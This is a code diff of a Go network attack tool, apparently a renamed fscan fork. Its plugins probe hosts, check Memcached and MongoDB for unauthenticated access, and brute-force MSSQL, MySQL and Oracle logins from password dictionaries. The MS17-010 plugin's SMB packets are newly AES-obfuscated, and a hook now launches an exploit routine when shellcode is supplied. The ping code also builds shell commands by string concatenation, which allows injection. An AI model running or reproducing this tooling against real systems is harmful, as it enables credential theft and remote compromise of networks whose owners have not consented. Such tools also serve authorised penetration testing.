|
||||
return false
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
func RunPing(hostslist []string, chanHosts chan string) {
|
||||
var bsenv = ""
|
||||
if OS != "windows" {
|
||||
bsenv = "/bin/bash"
|
||||
}
|
||||
var wg sync.WaitGroup
|
||||
limiter := make(chan struct{}, 50)
|
||||
for _, host := range hostslist {
|
||||
wg.Add(1)
|
||||
limiter <- struct{}{}
|
||||
go func(host string) {
|
||||
if ExecCommandPing(host, bsenv) {
|
||||
livewg.Add(1)
|
||||
chanHosts <- host
|
||||
}
|
||||
<-limiter
|
||||
wg.Done()
|
||||
}(host)
|
||||
}
|
||||
wg.Wait()
|
||||
}
|
||||
|
||||
func ExecCommandPing(ip string, bsenv string) bool {
|
||||
var command *exec.Cmd
|
||||
if SysInfo.OS == "windows" {
|
||||
if OS == "windows" {
|
||||
command = exec.Command("cmd", "/c", "ping -n 1 -w 1 "+ip+" && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
|
||||
} else if SysInfo.OS == "linux" {
|
||||
} else if OS == "linux" {
|
||||
command = exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
|
||||
} else if SysInfo.OS == "darwin" {
|
||||
} else if OS == "darwin" {
|
||||
command = exec.Command(bsenv, "-c", "ping -c 1 -W 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
|
||||
}
|
||||
outinfo := bytes.Buffer{}
|
||||
|
@ -130,57 +231,88 @@ func ExecCommandPing(ip string, bsenv string) bool {
|
|||
}
|
||||
}
|
||||
|
||||
func PingCMDcheck(hostslist []string, bsenv string) {
|
||||
var wg sync.WaitGroup
|
||||
mutex := &sync.Mutex{}
|
||||
limiter := make(chan struct{}, 50)
|
||||
for _, host := range hostslist {
|
||||
wg.Add(1)
|
||||
limiter <- struct{}{}
|
||||
go func(host string) {
|
||||
defer wg.Done()
|
||||
if ExecCommandPing(host, bsenv) {
|
||||
mutex.Lock()
|
||||
fmt.Printf("(Ping) Target '%s' is alive\n", host)
|
||||
AliveHosts = append(AliveHosts, host)
|
||||
mutex.Unlock()
|
||||
}
|
||||
<-limiter
|
||||
}(host)
|
||||
}
|
||||
wg.Wait()
|
||||
func makemsg(host string) []byte {
|
||||
msg := make([]byte, 40)
|
||||
id0, id1 := genIdentifier(host)
|
||||
msg[0] = 8
|
||||
msg[1] = 0
|
||||
msg[2] = 0
|
||||
msg[3] = 0
|
||||
msg[4], msg[5] = id0, id1
|
||||
msg[6], msg[7] = genSequence(1)
|
||||
check := checkSum(msg[0:40])
|
||||
msg[2] = byte(check >> 8)
|
||||
msg[3] = byte(check & 255)
|
||||
return msg
|
||||
}
|
||||
func ICMPRun(hostslist []string, Ping bool) []string {
|
||||
if SysInfo.OS == "windows" {
|
||||
if Ping == false {
|
||||
IcmpCheck(hostslist)
|
||||
} else {
|
||||
PingCMDcheck(hostslist, "")
|
||||
}
|
||||
} else if SysInfo.OS == "linux" {
|
||||
if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
|
||||
if Ping == false {
|
||||
IcmpCheck(hostslist)
|
||||
|
||||
func checkSum(msg []byte) uint16 {
|
||||
sum := 0
|
||||
length := len(msg)
|
||||
for i := 0; i < length-1; i += 2 {
|
||||
sum += int(msg[i])*256 + int(msg[i+1])
|
||||
}
|
||||
if length%2 == 1 {
|
||||
sum += int(msg[length-1]) * 256
|
||||
}
|
||||
sum = (sum >> 16) + (sum & 0xffff)
|
||||
sum = sum + (sum >> 16)
|
||||
answer := uint16(^sum)
|
||||
return answer
|
||||
}
|
||||
|
||||
func genSequence(v int16) (byte, byte) {
|
||||
ret1 := byte(v >> 8)
|
||||
ret2 := byte(v & 255)
|
||||
return ret1, ret2
|
||||
}
|
||||
|
||||
func genIdentifier(host string) (byte, byte) {
|
||||
return host[0], host[1]
|
||||
}
|
||||
|
||||
func ArrayCountValueTop(arrInit []string, length int, flag bool) (arrTop []string, arrLen []int) {
|
||||
if len(arrInit) == 0 {
|
||||
return
|
||||
}
|
||||
arrMap1 := make(map[string]int)
|
||||
arrMap2 := make(map[string]int)
|
||||
for _, value := range arrInit {
|
||||
line := strings.Split(value, ".")
|
||||
if len(line) == 4 {
|
||||
if flag {
|
||||
value = fmt.Sprintf("%s.%s", line[0], line[1])
|
||||
} else {
|
||||
PingCMDcheck(hostslist, "/bin/bash")
|
||||
value = fmt.Sprintf("%s.%s.%s", line[0], line[1], line[2])
|
||||
}
|
||||
} else {
|
||||
fmt.Println("The current user permissions unable to send icmp packets")
|
||||
fmt.Println("start ping")
|
||||
PingCMDcheck(hostslist, "/bin/bash")
|
||||
}
|
||||
} else if SysInfo.OS == "darwin" {
|
||||
if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
|
||||
if Ping == false {
|
||||
IcmpCheck(hostslist)
|
||||
} else {
|
||||
PingCMDcheck(hostslist, "/bin/bash")
|
||||
}
|
||||
if arrMap1[value] != 0 {
|
||||
arrMap1[value]++
|
||||
} else {
|
||||
fmt.Println("The current user permissions unable to send icmp packets")
|
||||
fmt.Println("start ping")
|
||||
PingCMDcheck(hostslist, "/bin/bash")
|
||||
arrMap1[value] = 1
|
||||
}
|
||||
}
|
||||
return AliveHosts
|
||||
for k, v := range arrMap1 {
|
||||
arrMap2[k] = v
|
||||
}
|
||||
|
||||
i := 0
|
||||
for _ = range arrMap1 {
|
||||
var maxCountKey string
|
||||
var maxCountVal = 0
|
||||
for key, val := range arrMap2 {
|
||||
if val > maxCountVal {
|
||||
maxCountVal = val
|
||||
maxCountKey = key
|
||||
}
|
||||
}
|
||||
arrTop = append(arrTop, maxCountKey)
|
||||
arrLen = append(arrLen, maxCountVal)
|
||||
i++
|
||||
if i >= length {
|
||||
return
|
||||
}
|
||||
delete(arrMap2, maxCountKey)
|
||||
}
|
||||
return
|
||||
}
|
||||
|
|
|
@ -2,27 +2,37 @@ package Plugins
|
|||
|
||||
import (
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"net"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func MemcachedScan(info *common.HostInfo) (err error, result string) {
|
||||
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mem"])
|
||||
client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
func MemcachedScan(info *common.HostInfo) (err error) {
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if client != nil {
|
||||
client.Close()
|
||||
}
|
||||
}()
|
||||
if err == nil {
|
||||
client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
|
||||
rev := make([]byte, 1024)
|
||||
n, err := client.Read(rev)
|
||||
err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err == nil {
|
||||
if strings.Contains(string(rev[:n]), "STAT") {
|
||||
defer client.Close()
|
||||
result = fmt.Sprintf("Memcached:%s unauthorized", realhost)
|
||||
common.LogSuccess(result)
|
||||
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
|
||||
if err == nil {
|
||||
rev := make([]byte, 1024)
|
||||
n, err := client.Read(rev)
|
||||
if err == nil {
|
||||
if strings.Contains(string(rev[:n]), "STAT") {
|
||||
result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
|
||||
common.LogError(errlog)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
return err, result
|
||||
return err
|
||||
}
|
||||
|
|
|
@ -2,53 +2,89 @@ package Plugins
|
|||
|
||||
import (
|
||||
"fmt"
|
||||
_ "github.com/denisenkom/go-mssqldb"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"net"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func MongodbScan(info *common.HostInfo) error {
|
||||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
_, err := MongodbUnauth(info)
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
|
||||
common.LogError(errlog)
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
|
||||
flag = false
|
||||
senddata := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
|
||||
getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
|
||||
realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mgo"])
|
||||
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
if err != nil {
|
||||
return flag, err
|
||||
// op_msg
|
||||
packet1 := []byte{
|
||||
0x69, 0x00, 0x00, 0x00, // messageLength
|
||||
0x39, 0x00, 0x00, 0x00, // requestID
|
||||
0x00, 0x00, 0x00, 0x00, // responseTo
|
||||
0xdd, 0x07, 0x00, 0x00, // opCode OP_MSG
|
||||
0x00, 0x00, 0x00, 0x00, // flagBits
|
||||
// sections db.adminCommand({getLog: "startupWarnings"})
|
||||
0x00, 0x54, 0x00, 0x00, 0x00, 0x02, 0x67, 0x65, 0x74, 0x4c, 0x6f, 0x67, 0x00, 0x10, 0x00, 0x00, 0x00, 0x73, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x57, 0x61, 0x72, 0x6e, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x02, 0x24, 0x64, 0x62, 0x00, 0x06, 0x00, 0x00, 0x00, 0x61, 0x64, 0x6d, 0x69, 0x6e, 0x00, 0x03, 0x6c, 0x73, 0x69, 0x64, 0x00, 0x1e, 0x00, 0x00, 0x00, 0x05, 0x69, 0x64, 0x00, 0x10, 0x00, 0x00, 0x00, 0x04, 0x6e, 0x81, 0xf8, 0x8e, 0x37, 0x7b, 0x4c, 0x97, 0x84, 0x4e, 0x90, 0x62, 0x5a, 0x54, 0x3c, 0x93, 0x00, 0x00,
|
||||
}
|
||||
defer conn.Close()
|
||||
_, err = conn.Write(senddata)
|
||||
if err != nil {
|
||||
return flag, err
|
||||
//op_query
|
||||
packet2 := []byte{
|
||||
0x48, 0x00, 0x00, 0x00, // messageLength
|
||||
0x02, 0x00, 0x00, 0x00, // requestID
|
||||
0x00, 0x00, 0x00, 0x00, // responseTo
|
||||
0xd4, 0x07, 0x00, 0x00, // opCode OP_QUERY
|
||||
0x00, 0x00, 0x00, 0x00, // flags
|
||||
0x61, 0x64, 0x6d, 0x69, 0x6e, 0x2e, 0x24, 0x63, 0x6d, 0x64, 0x00, // fullCollectionName admin.$cmd
|
||||
0x00, 0x00, 0x00, 0x00, // numberToSkip
|
||||
0x01, 0x00, 0x00, 0x00, // numberToReturn
|
||||
// query db.adminCommand({getLog: "startupWarnings"})
|
||||
0x21, 0x00, 0x00, 0x00, 0x2, 0x67, 0x65, 0x74, 0x4c, 0x6f, 0x67, 0x00, 0x10, 0x00, 0x00, 0x00, 0x73, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x57, 0x61, 0x72, 0x6e, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x00,
|
||||
}
|
||||
buf := make([]byte, 1024)
|
||||
count, err := conn.Read(buf)
|
||||
if err != nil {
|
||||
return flag, err
|
||||
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
|
||||
checkUnAuth := func(address string, packet []byte) (string, error) {
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
_, err = conn.Write(packet)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
reply := make([]byte, 1024)
|
||||
count, err := conn.Read(reply)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
return string(reply[0:count]), nil
|
||||
}
|
||||
text := string(buf[0:count])
|
||||
if strings.Contains(text, "ismaster") {
|
||||
_, err = conn.Write(getlogdata)
|
||||
|
||||
// send OP_MSG first
|
||||
reply, err := checkUnAuth(realhost, packet1)
|
||||
if err != nil {
|
||||
reply, err = checkUnAuth(realhost, packet2)
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
count, err := conn.Read(buf)
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
text := string(buf[0:count])
|
||||
if strings.Contains(text, "totalLinesWritten") {
|
||||
flag = true
|
||||
result := fmt.Sprintf("Mongodb:%v unauthorized", realhost)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
}
|
||||
if strings.Contains(reply, "totalLinesWritten") {
|
||||
flag = true
|
||||
result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
return flag, err
|
||||
}
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -5,36 +5,50 @@ import (
|
|||
"encoding/hex"
|
||||
"errors"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"net"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
var (
|
||||
negotiateProtocolRequest, _ = hex.DecodeString("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
|
||||
sessionSetupRequest, _ = hex.DecodeString("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
|
||||
treeConnectRequest, _ = hex.DecodeString("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
|
||||
transNamedPipeRequest, _ = hex.DecodeString("0000004aff534d42250000000018012800000000000000000000000000088ea3010852981000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")
|
||||
trans2SessionSetupRequest, _ = hex.DecodeString("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
|
||||
negotiateProtocolRequest_enc = "G8o+kd/4y8chPCaObKK8L9+tJVFBb7ntWH/EXJ74635V3UTXA4TFOc6uabZfuLr0Xisnk7OsKJZ2Xdd3l8HNLdMOYZXAX5ZXnMC4qI+1d/MXA2TmidXeqGt8d9UEF5VesQlhP051GGBSldkJkVrP/fzn4gvLXcwgAYee3Zi2opAvuM6ScXrMkcbx200ThnOOEx98/7ArteornbRiXQjnr6dkJEUDTS43AW6Jl3OK2876Yaz5iYBx+DW5WjiLcMR+b58NJRxm4FlVpusZjBpzEs4XOEqglk6QIWfWbFZYgdNLy3WaFkkgDjmB1+6LhpYSOaTsh4EM0rwZq2Z4Lr8TE5WcPkb/JNsWNbibKlwtNtp94fIYvAWgxt5mn/oXpfUD"
|
||||
sessionSetupRequest_enc = "52HeCQEbsSwiSXg98sdD64qyRou0jARlvfQi1ekDHS77Nk/8dYftNXlFahLEYWIxYYJ8u53db9OaDfAvOEkuox+p+Ic1VL70r9Q5HuL+NMyeyeN5T5el07X5cT66oBDJnScs1XdvM6CBRtj1kUs2h40Z5Vj9EGzGk99SFXjSqbtGfKFBp0DhL5wPQKsoiXYLKKh9NQiOhOMWHYy/C+Iwhf3Qr8d1Wbs2vgEzaWZqIJ3BM3z+dhRBszQoQftszC16TUhGQc48XPFHN74VRxXgVe6xNQwqrWEpA4hcQeF1+QqRVHxuN+PFR7qwEcU1JbnTNISaSrqEe8GtRo1r2rs7+lOFmbe4qqyUMgHhZ6Pwu1bkhrocMUUzWQBogAvXwFb8"
|
||||
treeConnectRequest_enc = "+b/lRcmLzH0c0BYhiTaYNvTVdYz1OdYYDKhzGn/3T3P4b6pAR8D+xPdlb7O4D4A9KMyeIBphDPmEtFy44rtto2dadFoit350nghebxbYA0pTCWIBd1kN0BGMEidRDBwLOpZE6Qpph/DlziDjjfXUz955dr0cigc9ETHD/+f3fELKsopTPkbCsudgCs48mlbXcL13GVG5cGwKzRuP4ezcdKbYzq1DX2I7RNeBtw/vAlYh6etKLv7s+YyZ/r8m0fBY9A57j+XrsmZAyTWbhPJkCg=="
|
||||
transNamedPipeRequest_enc = "k/RGiUQ/tw1yiqioUIqirzGC1SxTAmQmtnfKd1qiLish7FQYxvE+h4/p7RKgWemIWRXDf2XSJ3K0LUIX0vv1gx2eb4NatU7Qosnrhebz3gUo7u25P5BZH1QKdagzPqtitVjASpxIjB3uNWtYMrXGkkuAm8QEitberc+mP0vnzZ8Nv/xiiGBko8O4P/wCKaN2KZVDLbv2jrN8V/1zY6fvWA=="
|
||||
trans2SessionSetupRequest_enc = "JqNw6PUKcWOYFisUoUCyD24wnML2Yd8kumx9hJnFWbhM2TQkRvKHsOMWzPVfggRrLl8sLQFqzk8bv8Rpox3uS61l480Mv7HdBPeBeBeFudZMntXBUa4pWUH8D9EXCjoUqgAdvw6kGbPOOKUq3WmNb0GDCZapqQwyUKKMHmNIUMVMAOyVfKeEMJA6LViGwyvHVMNZ1XWLr0xafKfEuz4qoHiDyVWomGjJt8DQd6+jgLk="
|
||||
negotiateProtocolRequest, _ = hex.DecodeString(AesDecrypt(negotiateProtocolRequest_enc, key))
|
||||
sessionSetupRequest, _ = hex.DecodeString(AesDecrypt(sessionSetupRequest_enc, key))
|
||||
treeConnectRequest, _ = hex.DecodeString(AesDecrypt(treeConnectRequest_enc, key))
|
||||
transNamedPipeRequest, _ = hex.DecodeString(AesDecrypt(transNamedPipeRequest_enc, key))
|
||||
trans2SessionSetupRequest, _ = hex.DecodeString(AesDecrypt(trans2SessionSetupRequest_enc, key))
|
||||
)
|
||||
|
||||
func MS17010(info *common.HostInfo) error {
|
||||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
err := MS17010Scan(info)
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err)
|
||||
common.LogError(errlog)
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
func MS17010Scan(info *common.HostInfo) error {
|
||||
|
||||
ip := info.Host
|
||||
// connecting to a host in LAN if reachable should be very quick
|
||||
conn, err := net.DialTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
//fmt.Printf("failed to connect to %s\n", ip)
|
||||
return err
|
||||
}
|
||||
defer conn.Close()
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
//fmt.Printf("failed to connect to %s\n", ip)
|
||||
return err
|
||||
|
@ -77,7 +91,7 @@ func MS17010Scan(info *common.HostInfo) error {
|
|||
// find byte count
|
||||
byteCount := binary.LittleEndian.Uint16(sessionSetupResponse[7:9])
|
||||
if n != int(byteCount)+45 {
|
||||
fmt.Println("invalid session setup AndX response")
|
||||
fmt.Println("[-]", ip+":445", "ms17010 invalid session setup AndX response")
|
||||
} else {
|
||||
// two continous null bytes indicates end of a unicode string
|
||||
for i := 10; i < len(sessionSetupResponse)-1; i++ {
|
||||
|
@ -122,6 +136,11 @@ func MS17010Scan(info *common.HostInfo) error {
|
|||
//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
|
||||
result := fmt.Sprintf("[+] %s\tMS17-010\t(%s)", ip, os)
|
||||
common.LogSuccess(result)
|
||||
defer func() {
|
||||
if common.SC != "" {
|
||||
MS17010EXP(info)
|
||||
}
|
||||
}()
|
||||
// detect present of DOUBLEPULSAR SMB implant
|
||||
trans2SessionSetupRequest[28] = treeID[0]
|
||||
trans2SessionSetupRequest[29] = treeID[1]
|
||||
|
@ -137,13 +156,12 @@ func MS17010Scan(info *common.HostInfo) error {
|
|||
}
|
||||
|
||||
if reply[34] == 0x51 {
|
||||
//fmt.Printf("DOUBLEPULSAR SMB IMPLANT in %s\n", ip)
|
||||
result := fmt.Sprintf("DOUBLEPULSAR SMB IMPLANT in %s", ip)
|
||||
result := fmt.Sprintf("[+] %s has DOUBLEPULSAR SMB IMPLANT", ip)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
|
||||
} else {
|
||||
result := fmt.Sprintf("%s (%s)", ip, os)
|
||||
result := fmt.Sprintf("[*] %s (%s)", ip, os)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
return err
|
|
@ -4,12 +4,16 @@ import (
|
|||
"database/sql"
|
||||
"fmt"
|
||||
_ "github.com/denisenkom/go-mssqldb"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func MssqlScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
for _, user := range common.Userdict["mssql"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
|
@ -17,9 +21,15 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
|
|||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] mssql %v %v %v %v %v", info.Host, common.PORTList["mssql"], user, pass, err)
|
||||
errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -28,12 +38,12 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, common.PORTList["mssql"], user, pass
|
||||
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
|
||||
db, err := sql.Open("mssql", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
|
|
|
@ -4,12 +4,16 @@ import (
|
|||
"database/sql"
|
||||
"fmt"
|
||||
_ "github.com/go-sql-driver/mysql"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func MysqlScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
for _, user := range common.Userdict["mysql"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
|
@ -17,9 +21,15 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
|
|||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] mysql %v %v %v %v %v", info.Host, common.PORTList["mysql"], user, pass, err)
|
||||
errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -28,12 +38,12 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, common.PORTList["mysql"], user, pass
|
||||
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host, Port, "mysql")
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
|
||||
db, err := sql.Open("mysql", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
|
|
|
@ -0,0 +1,57 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"database/sql"
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
_ "github.com/sijms/go-ora/v2"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func OracleScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
for _, user := range common.Userdict["oracle"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
flag, err := OracleConn(info, user, pass)
|
||||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
return tmperr
|
||||
}
|
||||
|
||||
func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
|
||||
db, err := sql.Open("oracle", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
if err == nil {
|
||||
result := fmt.Sprintf("[+] oracle:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
common.LogSuccess(result)
|
||||
flag = true
|
||||
}
|
||||
}
|
||||
return flag, err
|
||||
}
|
|
@ -2,100 +2,117 @@ package Plugins
|
|||
|
||||
import (
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"net"
|
||||
"example.com/fxscan/common"
|
||||
"sort"
|
||||
"strconv"
|
||||
"sync"
|
